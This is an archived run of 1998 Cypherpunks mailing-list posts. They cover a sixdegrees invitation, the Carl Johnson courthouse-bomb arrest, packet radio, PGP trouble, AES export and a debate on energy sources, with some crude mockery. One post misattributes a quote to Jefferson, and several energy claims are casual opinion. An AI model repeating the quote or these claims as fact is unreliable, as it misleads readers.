From: "sixdegrees"<661850g1@auto.sixdegrees.com>
Date: Wed, 9 Sep 1998 20:09:49 +0800
To: "Ivan Cypherpunk"<cypherpunks@Algebra.COM>
Subject: Joe Cypherpunk
Message-ID: <199809091200.IAA18283@www.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Ivan Cypherpunk
E-Mail Address: cypherpunks@algebra.com
sixdegrees Password: listhome

Hi. You've been sponsored as "Significant Other" by Joe Cypherpunk 
as part of something called sixdegrees, one of the fastest growing 
phenomena on the Web, located at http://www.sixdegrees.com

You may have already heard of the six degrees of separation concept 
- where everyone on the planet is connected to each other through 
fewer than 6 people. Well, we haven't quite connected the whole 
world yet, but there are over a million people participating, and 
over 900,000 of them are connected in one giant chain. 

And, just by confirming your relationship with Joe, you can 
instantly tap into this interconnected community of interesting people 
from all over the world.

So what? Well, by getting connected, you can come to the Web site 
(which is completely FREE) and use a whole variety of valuable, fun 
and intriguing services that make use of this massive chain of 
connections.

You can come see who's logged on the site right now and when you 
find someone interesting, we'll show you exactly how you're 
connected no matter how many degrees it takes, and then you can 
instant message them. 

You can also find out how you're connected to that head of personnel 
at the big firm where you've been trying to get your foot in the 
door. 

You can chat with people from around the globe and then see who you
know in common. 

You can post burning questions on your own personalized bulletin 
board and get valuable answers from your "circle" (your friends 
and friends of friends). 

You can even get Movie recommendations from the people you're 
connected to.

So, stop by the site at http://www.sixdegrees.com to learn more and 
give it a try. (You can log in with this password: listhome). 

====================================================================

You can also get things started and get yourself connected right 
from this e-mail: 

** To confirm your relationship with Joe, just send a reply 
   that says only CONFIRM on the first line of the message body

*  To deny this particular relationship (but keep open the
   possibility of joining sixdegrees if the concept intrigues you) 
   send a reply that says only DENY

*  And, if you'd like to make sure you don't hear from us again 
   (even if somebody else you know lists you as a contact) then 
   simply send a reply which says REMOVE in the SUBJECT LINE so 
   we can process your request right away

Thanks, and we look forward to seeing you at sixdegrees.

====================================================================

And, if you're really ambitious, you can get your network of 
connections growing right away. Just list the people you think might 
be interested in participating in sixdegrees and we'll contact them 
with an e-mail like this one which mentions your name and invites 
them to join.

Just follow these directions:

*  Click your mail program's REPLY button. 

*  On the FIRST line of the message body of the reply e-mail that 
   opens, type only the word CONFIRM to let us know that you 
   are in fact Joe's Significant Other.

*  On the next line of the message body list the first and last 
   names and e-mail addresses of the people you'd like to invite
   (you can list as many as you'd like - but we recommend you list 
   at least two), and the relationship numbers that correspond 
   with how those people are related to you. 

MAKE SURE:  

*  That the first name, last name, e-mail address and relationship 
   number are separated by SEMI-COLONS. 

*  You follow the format of these examples:

     John; Smith; jsmith@fakeplace.com; 12
     Jane; Doe; superjane@fakeplace.com; 3

*  And that you define each relationship by choosing a number from 
   this list:

 1=wife              2=husband              3=life partner
 4=significant other 5=mother               6=father
 7=sister            8=brother              9=daughter
10=son              11=other family member 12=friend
13=employer         14=employee            15=co-worker
16=client           17=service provider    18=business contact
19=fellow alum      20=acquaintance 


We look forward to hearing from you!

===================================================================

PLEASE NOTE: All replies to this address are processed by a 
computer. If you have any problems, questions or requests send 
an e-mail to issues@sixdegrees.com and you'll receive a prompt 
and courteous response.

And, if you'd like to review our privacy statement just visit 
http://www.sixdegrees.com/Public/About/Privacy.asp

====================================================================

sixdegrees is Registered in the U.S. Patent and Trademark Office.


E.DB.ANB.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 23:42:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: usa-v-cej-wc.htm (fwd)
In-Reply-To: <199809090053.TAA12423@einstein.ssz.com>
Message-ID: <v03130308b21c4e709187@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:56 AM -0700 9/9/98, Lucky Green wrote:
>On Tue, 8 Sep 1998, Jim Choate wrote:
>(Quoting criminal complaint)
>> >    Internet group known as the "Cypherpunks." During the investigation of
>>
>> This guy has experience with the Internet and doesn't know the difference
>> between a group and a mailing list, what a maroon.
>
>I am sure he knows the difference. And in this case he was talking about
>a "Cypherpunks group", as in "the Cypherpunks militia", as in "criminal
>organization", not as in mailing list.

Who told him about the Cypherpunks Militia?  Does he know about the Jihad
to Liberate the Encrypted Places? Do they know about Cypherpunks Target
Practice?

(BTW, the use of the terms "group" and "mailing list" semi-interchangeably
is a natural one. I do it all the time. Check the archives.)

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 9 Sep 1998 23:39:21 +0800
To: Ryan Lackey <ryan@systemics.ai>
Subject: Re: radio net
In-Reply-To: <E0zGSWY-0002wH-00@arianrhod.systemics.ai>
Message-ID: <35F6A0C6.76D3@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey wrote:
> 
> Is anyone else interested in setting up a radio net (probably packet radio
> relay) to relay small quantities of data in the event the telecommunications
> infrastructure becomes unavailable (either technically or legally/politically/
> militarily)?  There are existing packet relay nets, but in my experience
> amateur radio people, especially in the US, are very willing to roll over
> for the government at the slightest cause.
> 
> I think the cost would be something like $1-5k per station, and it could
> be done in a fairly turnkey fashion.  Exactly how to handle routing and
> what protocol to use on the network is kind of an open question -- there
> are a lot of solutions, none of them optimal.

This is a very nice idea but tread carefully here. RF communications is
one area in which the no-domestic-crypto law IS established. The idea of
spies with shortwaves in their cigar boxes may seem hopelessly outdated
but I think the law still stands. Talk to some packet radio guys - I
think some have had trouble just sending unknown file formats. This was
a while back though - who knows - progress may have been made.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 9 Sep 1998 23:54:10 +0800
To: Fisher Mark <fisherm@tce.com>
Subject: Re: Zooko on JYA, cpunks, and surveillance (was: Re: Can't tell the kooks without a scorecard? Re: Monkey Wrenching the Echelon Engine)
In-Reply-To: <2C396693FBDED111AEF60000F84104A721BFA5@indyexch_fddi.indy.tce.com>
Message-ID: <35F6A1BF.559A@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Fisher Mark wrote:
> I've had some dealings with
> local government people on real estate issues (who have generally been
> reasonably helpful), and the set of people who like practical jokes has a
> (nearly?) null intersection with the set of people who go into government
> service.
>
Heard a good Jefferson quote on cpsan -

"Literalism is a hobgoblin of small minds" -Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 9 Sep 1998 09:12:07 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: interchange...
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F83CA@MSX11002>
Message-ID: <Pine.GSO.3.96.980909085956.2287A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



I will be interchanging the meaning of cryptography with encryption, 
will this be alright or will it only confuse my listeners?

Thank you.


It's me Bernie.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.


metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Van Over <jhvo@earthlink.net>
Date: Wed, 9 Sep 1998 13:11:58 +0800
To: amp@pobox.com
Subject: PGP5.5.5 Problem
Message-ID: <35F6A8B2.CCB6D9FF@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



I am seeking assistance with a PGP 5.5.5 system and noting your comments
on the net I thought it might be possible for you to help me with a
solution.

I have been using PGP5.5.5, successfully, for the past four months.
However, beginning three days ago I began experiencing a problem.  I am
using Netscape Navigator and the Netscape Message Center.  The problem:
When I receive a PGP message I copy it to the clipboard, but, when I
depress the "decrypt and verify" line on the PGP tool bar the screen for
the "pass phrase" flashes briefly on the screen and disappears.  The
same thing happens when I use the PGP tools.  The PGP tool bar first
referred to is the lock icon at the bottom of the screen.  I have
compared my public key with the key from which I receive messages and
they are identical.  I am able to encrypt a message to myself and then
decrypt it without any problem.  It is only when I receive a message
from my other computer does the problem exist.

I would very much appreciate any ideas you may have as how to correct
this problem.  Please make your solution as basic as possible as I am
not as "computer literate" as I need to be in order to understand most
explanations.

Thank You

Jim Van Over




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Sep 1998 21:35:31 +0800
To: cypherpunks@toad.com
Subject: CP Cite
Message-ID: <199809091318.JAA17051@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We're putting together copies of cpunk messages Jeff 
Gordon cites in the Carl Johnson complaint and have 
found all in the archives except one dated June10, 1998. 
Jeff describes it:

   15. On June 10, 1998, an anonymous message was 
   posted to the Cypherpunks Internet group. In the
   message, it is stated that the bomber "placed the bomb 
   before embarking on a middle-leg of the TruthMonger
   SoftTarget Tour of Planet Terra." The message also 
   referenced an RCMP plan to "drive a known madman 
   crazy enough to finally put him away turned bad, and
   resulted in a backlash of death and destruction ..." I 
   noted that this message contained information about the
   courthouse bomb incident which had not previously been 
   made public, and was written in a style and manner
   which I recognized as being similar to other writings 
   which my investigation has linked to JOHNSON. In his
   interview with Special Agent Sheridan, JOHNSON 
   acknowledged using the name TruthMonger, and also
   stated he had psychological problems, both of which 
   correspond to this message. 

We'd appreciate getting a copy (yes, Jeff, if you would, anon ok).

BTW, there's a brief message from Lucky Green yesterday
in the archives on CEJ which did not appear on the
cyberpass list, AFAIK, although it was sent to ssz.com. Do such
gaps happen much in CDR?

Yeah, yeah, I post to toad, and aim to be the last one who
does, so drive me AP-mad.

BTW2, anybody know what Linda Reed thinks of her infame?

BTW3, we heard from TX that CJ's music/perform art is going to 
be boosted in concert with his god-sent cornseed of publicity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 13:01:20 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <199809082346.TAA31245@camel8.mindspring.com>
Message-ID: <v03110700b21c426498f5@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:40 PM -0500 9/8/98, Eric Cordian wrote:
>> Thanks to anonymous we offer the arrest warrant and
>> complaint against Carl Edward Johnson:
>
>I conclude:
>
>A. There actually exist federal investigators who have nothing
>   better to do with their lives than read the complete writings
>   of the Performance Artists Sometimes Known as "Toto," and
>   engage in endless mental masturbation over the hidden messages
>   they imagine to be contained therein.

	He <allegedly allegedly allegedly> planted a bomb. Like Mr. Bell,
this is a very dumb thing to do, especially when the bomb didn't go off.


>B. When writing parody on the subject of AP, it is best not to
>   employ the names of actual federal slackers, lest the clueless
>   investigators actually believe them to be targeted in some fashion.

	If they had a sense of humor, they wouldn't work for the government.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 22:37:19 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: CP Cite (fwd)
Message-ID: <199809091442.JAA15831@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 09 Sep 1998 09:12:28 -0400
> From: John Young <jya@pipeline.com>
> Subject: CP Cite

> BTW, there's a brief message from Lucky Green yesterday
> in the archives on CEJ which did not appear on the
> cyberpass list, AFAIK, although it was sent to ssz.com. Do such
> gaps happen much in CDR?

I've noticed such discrepencies in the past as well. Unfortunately I have
been unable to figure out exactly why a particular remailer (I've seen every
one do this at one time or another) will drop the resend. I don't know
whether it's a time out in the various time-to-lives or what. I've noticed
that the various remailers will sometimes change message id's causing
multiple copies as well. I don't believe it's important since it doesn't
happen very often, as near as I can determine. As long as any archives
subscribe to all the lists and use some sort of duplicate filtering it
shouldn't be a real issue.

I do know that SSZ holds messages at least 4 days and my ISP holds them for
5 days so I don't think it's a connection problem resulting in dropped
traffic.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 9 Sep 1998 12:59:29 +0800
To: cryptography@c2.net
Subject: Re: IP: Encryption Expert Says U.S. Laws Led to Renouncing of    Citizenship
In-Reply-To: <v0401173cb2186ae5e832@[139.167.130.246]>
Message-ID: <35F633A6.B307772A@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:
> 
> At 11:01 AM 9/7/98 +0100, Mok-Kong Shen wrote:
>
> >Let's wait and see whether AES will be genuinely exportable.

> 
> Surely you jest.  The head AES honcho will send you (in .de) the CD of the
> english
> specs, but not the one with the code.  Like it matters.

I suppose one should not forget one aspect if AES is to become an
ISO standard. There will be different implementations but one
needs validations. For compilers there are validation centres
run by certain institutes authorized by some national standard
organizations (certificates of validation are issued). Similar 
facilities should be assured for the future AES. Implementation 
as such can't in my opinion be a big problem outside of US.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 12:52:41 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <199809090140.UAA29195@wire.insync.net>
Message-ID: <v03110702b21c46b59c74@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:37 PM -0500 9/8/98, Tim May wrote:
>
>I suppose I agree with Eric's earlier point (snipped above) that mentioning
>the actual names of judges or FBI agents or IRS inspectors in rants about
>AP and AP bots is not a wise move. As with Bell's stuff, it makes for a
>case that _possibly_ these agents and judges had something to fear. Were I
>one of those judges or agents, I would tend to think that _possibly_ my
>life was in danger.

	One could point out that WE have reason to beleive that our lives
and freedoms are in danger.

>Best to leave rants at the general, protected speech level, and to not get
>into specifics of names and working habits of agents.

	That, and don't plant bombs that don't go off.

>But Toto will probably make a plea, as Bell did.

	He may be nuts enough not to.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 12:56:11 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03110710b21b6a259806@[206.189.103.244]>
Message-ID: <v03110703b21c4777ca38@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:25 PM -0500 9/8/98, William H. Geiger III wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In <v03110710b21b6a259806@[206.189.103.244]>, on 09/08/98
>   at 06:17 PM, Petro <petro@playboy.com> said:
>
>>	No, more like a get off our fucking land.
>
>Sure thing, and where you live, exactly who's land was it before you got
>there?

	Point is, the "Arabs" didn't start it, the UN/European leaders (US,
UK, FR, and RU) did.


	If I move you off your property at the point of a gun, should I
expect you to _like_ it, even if I gave you what I consider "fair market
value"?

	Oh, and the about should have read:

	No, more like a "get off our fucking land".

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 23:28:15 +0800
To: "William H. Geiger III" <ravage@einstein.ssz.com>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809082359.SAA12044@einstein.ssz.com>
Message-ID: <v03110704b21c4832f604@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:22 PM -0500 9/8/98, William H. Geiger III wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In <199809082359.SAA12044@einstein.ssz.com>, on 09/08/98
>   at 06:59 PM, Jim Choate <ravage@einstein.ssz.com> said:
>
>>Forwarded message:
>
>>> Date: Tue, 8 Sep 1998 18:17:45 -0500
>>> From: Petro <petro@playboy.com>
>>> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
>
>>> planet and take all that fucking oil with them.
>
>>I wonder how the new realization that the calthrate deposits in the ocean
>>bottem off the continental shelf make fine fuel and it's replenishable
>>and may be of a larger quantity than the oil reserves will effect the
>>power balance.
>
>Once an alternative fuel source is discovered that is more economical than
>oil,

	There already are several, the problem is the cannot be centralized
the way oil is.

	Alcohol is acceptable (and in some ways better) than gasoline for
cars and motorcycles, but anyone can set up a still and compete with RDS &
Standard. A mix of solar, wind, coal, hydroelectric, nuclear and other
sources can provide most of the rest of the power we need. It is just a
matter of being willing to make the investment in the changeover.

> the arabs will slip back into obscurity.

	Yeah, and the US will suddenly find that there is no longer an
reason to provide Isreal with HOW MUCH military support per year?

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Sep 1998 12:12:13 +0800
To: cypherpunks@Algebra.COM
Subject: Netly News on Nutly News (resend)
Message-ID: <Pine.GSO.3.95.980909100305.27131D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 9 Sep 1998 05:42:20 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: The Arrest of the Nutly Bomber




http://cgi.pathfinder.com/netly/0,2326,201980909-14593,00.html

TIME Digital Daily
September 9, 1998 

   The Arrest of the Nutly Bomber 
   By Declan McCullagh (declan@well.com)
   
   [Part I of a Series For two years a pair of anonymous Net crackpots
   have been posting angry tirades to a cryptography discussion list
   under a takeoff of Netly called "Nutly News." Now the FBI and Royal
   Canadian Mounted Police say that a digital signature connects them to
   a bomb discovered last June in a Canadian courthouse.]
   
   It was about 5 p.m. on August 18. Carl Johnson, 49, was beating the
   heat inside the Rialto Theater in what passes for downtown Tuscon,
   Ariz. That morning a friend had tipped off Johnson that the police    
   were trying to find him, but for now he had something else on his
   mind: his music. The itinerant musician and writer had spent the last
   month furiously scribbling lyrics, friends say, and he wanted a loan
   from someone he knew who worked at the theater. It was for some
   recording work, Johnson explained. This was going be his third album,
   after "My Way or the Highway" and "Please! Stop Me Before I Sing
   Again."
  
   But when Johnson left the Rialto, his musical career was cut short by
   two federal agents from the IRS's internal security division. They
   arrested him on charges of Internet threats against federal judges and
   police. The Canadians wanted Johnson, too, on charges of planting a
   bomb in a Saskatchewan courthouse.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 9 Sep 1998 23:45:13 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809091556.KAA16265@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Sep 1998 10:03:25 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)

> 	There already are several, the problem is the cannot be centralized
> the way oil is.

That's not really the problem...

> 	Alcohol is acceptable (and in some ways better) than gasoline for
> cars and motorcycles, but anyone can set up a still and compete with RDS &
> Standard.

The problem with alcohol is that there isn't enough free land in order grow
enough plant material to provide the necessary quantities without seriously
restricting the amount of land available for actual foodstuffs and living
space (unless you want everyone to move to Black Rock desert or live on the
top of a mountain).

Alcohol is also much more of a fire hazard than gas. It burns hotter, isn't
put out by water spray easily, and burns invisibly (well all right in the
near-UV).

> A mix of solar

Again not enough land to make it feasible, not to mention the low efficiency
of even the best panels.

> wind

Not enough places in the US (or anywhere else for that matter) where the 
wind blows with sufficient force 18 hours a day to make it economical.

> coal

Coal isn't an acceptable substitute, mainly because there isn't enough
low-sulphur deposits in the world to supply the US, let alone the rest of
the world. Plus it isn't renewable.

> hydroelectric

Not enough rivers with sufficient hydrodynamic head to make this work
for the US let alone the rest of the planet.

> nuclear

I'll buck the general consensus because I like nuclear energy, however there
is a single MAJOR caveat, we need fussion and not fission reactors to make
it economical. The waste problem with fission reactors is enough to vote
in the negative on them.

> and other sources

cop-out.

The reality is that the clathrate deposits occur across the entire ocean.
The existing Magnesium Nodule treaties could be extended to cover the
countries that don't have coastlines. They are the first renewable,
occurring in sufficient quantity, and with realizable and economicly
feasible methods for mining, processing, and distributing to have been put
on the table.

As to the gas and oil folk being against them, they're about the only ones
with an existing infrastructure (ie extracting oil and gas from the sea
floor) to take advantage of the source, implying that existing changes in
the infrastructure would be minor.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 9 Sep 1998 16:59:20 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: usa-v-cej-wc.htm (fwd)
In-Reply-To: <199809090053.TAA12423@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980909105231.14862A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Sep 1998, Jim Choate wrote:
(Quoting criminal complaint) 
> >    Internet group known as the "Cypherpunks." During the investigation of
> 
> This guy has experience with the Internet and doesn't know the difference
> between a group and a mailing list, what a maroon.

I am sure he knows the difference. And in this case he was talking about
a "Cypherpunks group", as in "the Cypherpunks militia", as in "criminal
organization", not as in mailing list.

PsyOps is in full force.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 9 Sep 1998 13:17:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: wired on y2k
In-Reply-To: <199809080235.TAA23415@netcom13.netcom.com>
Message-ID: <v04011703b21c48c599ad@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:53 PM -0400 on 9/8/98, Michael Motyka wrote:


> Water? Met a reactor designer from Los Alamos once who lived in some
> super but isolated place in the Sangre De Christos. He had to drill some
> 3K ft for water. VERY EXPENSIVE.

Being 3k feet above the floor of the Rio Grande Valley will kinda do that
to ya...

I prefer northeast Lincoln County, myself...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 11:47:43 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809091556.KAA16265@einstein.ssz.com>
Message-ID: <v03110706b21c595cfe06@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:56 AM -0500 9/9/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 9 Sep 1998 10:03:25 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
>
>> 	There already are several, the problem is the cannot be centralized
>> the way oil is.
>That's not really the problem...

	I'd say it is, but hell, I'm paranoid.

>
>> 	Alcohol is acceptable (and in some ways better) than gasoline for
>> cars and motorcycles, but anyone can set up a still and compete with RDS &
>> Standard.
>
>The problem with alcohol is that there isn't enough free land in order grow
>enough plant material to provide the necessary quantities without seriously
>restricting the amount of land available for actual foodstuffs and living
>space (unless you want everyone to move to Black Rock desert or live on the
>top of a mountain).

	There are lots of things you can make alcohol out of. Seaweed, etc.

	There would also be incentive to other countries to produce excess
for importation into the US.

>Alcohol is also much more of a fire hazard than gas. It burns hotter, isn't

	And what would you need to add to it to "color" the flame?

>put out by water spray easily, and burns invisibly (well all right in the
>near-UV).

	Put about 2% detergent (just about any grade will do) into that
"water spray", and the fire goes out quicker, and stays out longer.

>> A mix of solar
>Again not enough land to make it feasible, not to mention the low efficiency
>of even the best panels.

	There are plenty of unused roof tops here in Chicago bouncing free
energy off into the air.

>> wind
>Not enough places in the US (or anywhere else for that matter) where the
>wind blows with sufficient force 18 hours a day to make it economical.

	Again, there are a lot of tall buildings here where the wind is
constantly moving. Also, we have this large, flat, relatively undeveloped
area just to the east of chicago where the wind is constantly at least 10
m.p.h. (from (admittedly imperfect memory) 7 m.p.h. is necessary to run an
electric generator from a windmill) and where no one lives.

	It's called Lake Michigan.

>> coal
>Coal isn't an acceptable substitute, mainly because there isn't enough
>low-sulphur deposits in the world to supply the US, let alone the rest of
>the world. Plus it isn't renewable.

	No, but it is PART of the solution.

>> hydroelectric
>Not enough rivers with sufficient hydrodynamic head to make this work
>for the US let alone the rest of the planet.

	Again, PART of the solution.
>> nuclear
>
>I'll buck the general consensus because I like nuclear energy, however there
>is a single MAJOR caveat, we need fussion and not fission reactors to make
>it economical. The waste problem with fission reactors is enough to vote
>in the negative on them.

	The waste problem goes away of you build a decently stable launch
platform and drop the shit into the sun.

>> and other sources
>cop-out.

	No, it's an inclusive statment. It takes into account things like
your beloved Clathrate deposits, things like the possiblity of launching
"power sats" into orbit (altho I am not real clear on how the energy gets
back down, something about using microwaves <shrug>)

	Also, you ignored, or didn't see the "mix of" statement. Oil CAN be
replaced, and should be. There are plenty of ways to replace the energy
with something else, and there are ways--without modifying lifestyles all
that much--to reduce dependence on oil.

	No, don't look at me to be waving the Big Green Flag, I mean I'm
for clean air as much as the next guy, and I guess trees are kinda nice to
look at, but I'd like to see far more diversity in energy sources, and
investigation into more long term, renewable sources.

>The reality is that the clathrate deposits occur across the entire ocean.
>The existing Magnesium Nodule treaties could be extended to cover the
>countries that don't have coastlines. They are the first renewable,
>occurring in sufficient quantity, and with realizable and economicly
>feasible methods for mining, processing, and distributing to have been put
>on the table.

	Actually it looks like something that could be made in a factory.
Take a methane source (sewage, rotting plant matter) pump it into really
cold water under pressure, and blam.

>As to the gas and oil folk being against them, they're about the only ones
>with an existing infrastructure (ie extracting oil and gas from the sea
>floor) to take advantage of the source, implying that existing changes in
>the infrastructure would be minor.

	Depends on what you want it to replace. The one of the largest uses
of oil is in the transportation sector, and "they" have been pushing
Natural Gas there for years to little effect.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@lo14.wroc.pl>
Date: Wed, 9 Sep 1998 13:46:52 +0800
To: kamikaze23@juno.com>
Subject: Re: Any good hacking sites?
Message-ID: <4abeb8cbbcd0d664e6c810ce33e4f40f@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



M I T wrote:
> ...
> also, any1 here into AOL hacking???
> 

Oh, this is almost _too_ easy...

Yeah, we know about AOL hacking... First, you get a couple of million clueless fucktards like yourself together and give all of them the same 800-number to dial in... Watch what follows:

<closeup of two fuckholes; if breathing weren't an autonomic response, they'd both be dead>

bzzzt... bzzzt... bzzzt... <fx: busy signal>

Lamer #1: "Hey, d00d, whatcha doin?"

bzzzt... bzzzt... bzzzt... 

Lamer #2: "I'm hacking AOL, man."

bzzzt... bzzzt... bzzzt... 

Lamer #1: "Whoa! C00l, d00d! Can I like, watch?"

bzzzt... bzzzt... bzzzt... 

Lamer #2: "Sure, man."

<cut to screen showing WinBlows "Starfield Simulation" screensaver>

...

Any questions?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cicho@free.polbox.pl (cicho)
Date: Wed, 9 Sep 1998 20:01:23 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Text Analysis and Shakespeare
In-Reply-To: <199809040233.TAA29401@netcom13.netcom.com>
Message-ID: <35f66746.1781792@193.59.1.1>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri wrote:

>a friend gave me a book called "the cryptographic
